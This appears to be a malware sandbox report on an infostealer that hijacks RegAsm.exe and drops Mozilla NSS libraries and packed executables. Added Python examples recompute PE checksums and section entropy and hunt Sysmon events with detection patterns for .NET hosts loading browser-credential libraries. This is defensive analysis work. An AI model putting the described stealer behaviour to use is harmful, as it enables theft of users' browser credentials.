Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source: Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source: Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source: Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source: Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004195E0
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: DHCGHDHIDH.exe.29.dr Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: userIEHDAFHDHC.exe.3.dr Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: HDAFIIDAKJ.exe.29.dr Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: userFBKFCFBFID.exe.3.dr Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: sql[1].dll.29.dr Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe Static PE information: real checksum: 0x3ca22 should be: 0x3ef0c
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
Source: nss3.dll.3.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
Source: sql[1].dll.29.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.29.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.29.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.29.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.29.dr Static PE information: section name: .00cfg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB7B536 push ecx; ret 3_2_6CB7B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043504B push ss; retf 24_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041AA05 push ecx; ret 29_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9EB536 push ecx; ret 29_2_6C9EB549
Source: file.exe Static PE information: section name: .text entropy: 7.986877735993568
Source: userFBKFCFBFID.exe.3.dr Static PE information: section name: .text entropy: 7.993781178446662
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr Static PE information: section name: .text entropy: 7.993781178446662
Source: userIEHDAFHDHC.exe.3.dr Static PE information: section name: .text entropy: 7.985801528758324
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr Static PE information: section name: .text entropy: 7.985801528758324
Source: DHCGHDHIDH.exe.29.dr Static PE information: section name: .text entropy: 7.993781178446662
Source: HDAFIIDAKJ.exe.29.dr Static PE information: section name: .text entropy: 7.985801528758324
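The checksum mismatches, the .00cfg/.didat section names and the .text entropy values listed above are static PE-header facts that can be recomputed offline without running the sample. The Python below is an added example written for this page, not Joe Sandbox output and not code from the sample: it reimplements the CheckSum algorithm used by imagehlp!CheckSumMappedFile (a 16-bit one's-complement sum over the whole file with the CheckSum field taken as zero, folded to 16 bits, plus the file length), walks the section table, and reports Shannon entropy per section. The 7.2 bits/byte threshold and the build_sample() fixture (a minimal, non-runnable PE32 constructed for the demonstration) are assumptions of the example. Two caveats a practitioner would want: Windows only enforces the header checksum for kernel-mode images, so a user-mode mismatch does not stop the file from loading; it only shows that the header was not refreshed after the file was last changed (packing, patching), and a stored value of 0x0, as reported for sql[1].dll, means the linker never wrote one. Second, .00cfg (Control Flow Guard data) and .didat (delay-load import data) are ordinary MSVC/clang-emitted sections and are expected in the Mozilla NSS and CRT DLLs the stealer drops; the .text entropy close to 7.99 in the .NET loaders is the stronger static signal, since plain compiled code usually measures well below 7.

```python
import math
import struct

PE32_MAGIC = 0x10B
PACKED_ENTROPY = 7.2   # bits/byte threshold for the packed/encrypted flag (assumption)


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for a
    uniform byte distribution (typical of encrypted or compressed .text)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_headers(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE\\0\\0 and return the offsets the checks need."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", data, 0x3C)[0]
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections = struct.unpack_from("<H", data, nt + 6)[0]    # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", data, nt + 20)[0]    # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = nt + 24                                            # IMAGE_OPTIONAL_HEADER
    return {
        "checksum_off": opt + 0x40,       # .CheckSum, same offset in PE32 and PE32+
        "section_table": opt + opt_size,  # first IMAGE_SECTION_HEADER
        "nsections": nsections,
    }


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """Recompute the header checksum as imagehlp!CheckSumMappedFile does: an
    end-around-carry sum of every 16-bit word with the CheckSum field zeroed,
    folded to 16 bits, plus the unpadded file length."""
    buf = bytearray(data)
    buf[checksum_off:checksum_off + 4] = b"\0\0\0\0"
    if len(buf) % 2:
        buf.append(0)                     # odd-length files are padded with one zero byte
    total = 0
    for (word,) in struct.iter_unpack("<H", buf):
        total += word
        total = (total >> 16) + (total & 0xFFFF)
    total = ((total >> 16) + total) & 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def sections(data: bytes, hdr: dict) -> list:
    """Return (name, raw_offset, raw_size, entropy) per 40-byte IMAGE_SECTION_HEADER."""
    out = []
    for i in range(hdr["nsections"]):
        off = hdr["section_table"] + i * 40
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)  # SizeOfRawData, PointerToRawData
        out.append((name, raw_ptr, raw_size, entropy(data[raw_ptr:raw_ptr + raw_size])))
    return out


def triage(data: bytes) -> dict:
    """Reproduce the report's two static findings: stored vs recomputed checksum,
    and per-section entropy with a high-entropy flag."""
    hdr = parse_headers(data)
    stored = struct.unpack_from("<I", data, hdr["checksum_off"])[0]
    computed = pe_checksum(data, hdr["checksum_off"])
    secs = sections(data, hdr)
    return {
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_ok": stored == computed,
        "sections": secs,
        "high_entropy": [s[0] for s in secs if s[3] >= PACKED_ENTROPY],
    }


def build_sample(text: bytes, checksum: int = 0) -> bytes:
    """Constructed fixture: a minimal, non-runnable PE32 with one .text section
    at file offset 0x200. Not a real file from the report."""
    opt_size = 0xE0
    hdr_len = (0x40 + 4 + 20 + opt_size + 40 + 0x1FF) & ~0x1FF   # round headers up to 0x200
    img = bytearray(hdr_len)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                       # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, nt + 4, 0x14C, 1)                # Machine=I386, NumberOfSections=1
    struct.pack_into("<H", img, nt + 20, opt_size)                # SizeOfOptionalHeader
    opt = nt + 24
    struct.pack_into("<H", img, opt, PE32_MAGIC)
    struct.pack_into("<I", img, opt + 0x40, checksum)             # CheckSum as stored in the header
    sec = opt + opt_size
    img[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<II", img, sec + 16, len(text), hdr_len)    # SizeOfRawData, PointerToRawData
    return bytes(img) + text


if __name__ == "__main__":
    # uniform bytes give entropy 8.0, like the packed .text sections in the report
    print(triage(build_sample(bytes(range(256)) * 2)))
```

Run triage() on a real file's bytes to get the same "real checksum / should be" pair the report prints, plus one entropy figure per section; a stored checksum of 0 with a non-zero computed value is the "never written" case, while a non-zero stored value that disagrees with the computed one means the file was modified after linking.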
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userFBKFCFBFID.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userIEHDAFHDHC.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\HDAFIIDAKJ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\DHCGHDHIDH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll
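The drop list above, together with the earlier "Section loaded" entries showing RegAsm.exe mapping mozglue.dll, vcruntime140.dll and msvcp140.dll, is the behaviour a host-based detection can key on: a .NET framework utility should never write randomly named PEs into C:\ProgramData or the C:\Users root, and should never load Mozilla NSS libraries at all. The Python below is an added example for this page, not part of the sandbox report and not the sample's code. It runs two checks over constructed Sysmon-style events (Event ID 7 ImageLoad and Event ID 11 FileCreate, using Sysmon's actual Image, ImageLoaded and TargetFilename field names); the events are made up to mirror the findings on this page. The list of .NET host binaries beyond RegAsm.exe, the DLL-name set and the drop-root list are assumptions chosen for the example.

```python
import ntpath

# .NET framework utilities commonly hollowed out to host a payload (assumption beyond RegAsm.exe)
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
# Mozilla NSS libraries and the SQLite helper the stealer drops to read browser profiles
NSS_DLLS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll", "sql.dll", "sqlite3.dll"}
# Directories where a PE written directly into the root (no sub-folder) is suspicious
DROP_ROOTS = {r"c:\programdata", r"c:\users"}


def _is_dotnet_host(image: str) -> bool:
    return ntpath.basename(image).lower() in DOTNET_HOSTS


def check_image_load(ev: dict):
    """Sysmon Event ID 7 (ImageLoad): a .NET host process mapping NSS libraries."""
    if ev.get("EventID") != 7 or not _is_dotnet_host(ev["Image"]):
        return None
    loaded = ev["ImageLoaded"]
    if ntpath.basename(loaded).lower() in NSS_DLLS:
        return f"stealer-nss-load: {ntpath.basename(ev['Image'])} loaded {loaded}"
    return None


def check_file_create(ev: dict):
    """Sysmon Event ID 11 (FileCreate): a .NET host writing an .exe/.dll straight
    into C:\\ProgramData or C:\\Users, matching the drop locations listed above.
    PE-ness is approximated by extension; a magic-byte check needs file access."""
    if ev.get("EventID") != 11 or not _is_dotnet_host(ev["Image"]):
        return None
    target = ev["TargetFilename"]
    parent = ntpath.dirname(target).lower().rstrip("\\")
    if parent in DROP_ROOTS and target.lower().endswith((".exe", ".dll")):
        return f"dotnet-host-drop: {ntpath.basename(ev['Image'])} wrote {target}"
    return None


def hunt(events: list) -> list:
    """Run both checks over a batch of events and return the alert strings in order."""
    hits = []
    for ev in events:
        for check in (check_image_load, check_file_create):
            hit = check(ev)
            if hit:
                hits.append(hit)
    return hits


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
# Constructed events mirroring the report's findings; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": REGASM, "ImageLoaded": r"C:\ProgramData\mozglue.dll"},
    {"EventID": 7, "Image": REGASM, "ImageLoaded": r"C:\Windows\SysWOW64\amsi.dll"},
    {"EventID": 7, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
    {"EventID": 11, "Image": REGASM, "TargetFilename": r"C:\ProgramData\HDAFIIDAKJ.exe"},
    {"EventID": 11, "Image": REGASM, "TargetFilename": r"C:\Users\userFBKFCFBFID.exe"},
    {"EventID": 11, "Image": REGASM,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe", "TargetFilename": r"C:\ProgramData\update.dll"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed batch this raises three alerts (the mozglue.dll load and the two root-level drops) and stays silent for Firefox loading its own nss3.dll and for a non-.NET process writing to ProgramData. The INetCache copies (name[1].dll) are left out of the drop-root check on purpose: they are browser-cache artifacts of the download API (consistent with urlmon.dll being loaded above) and would add noise, but finding both a cache copy and a ProgramData copy of the same NSS DLL is a useful corroborating pivot during triage.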
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userFBKFCFBFID.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIEHDAFHDHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
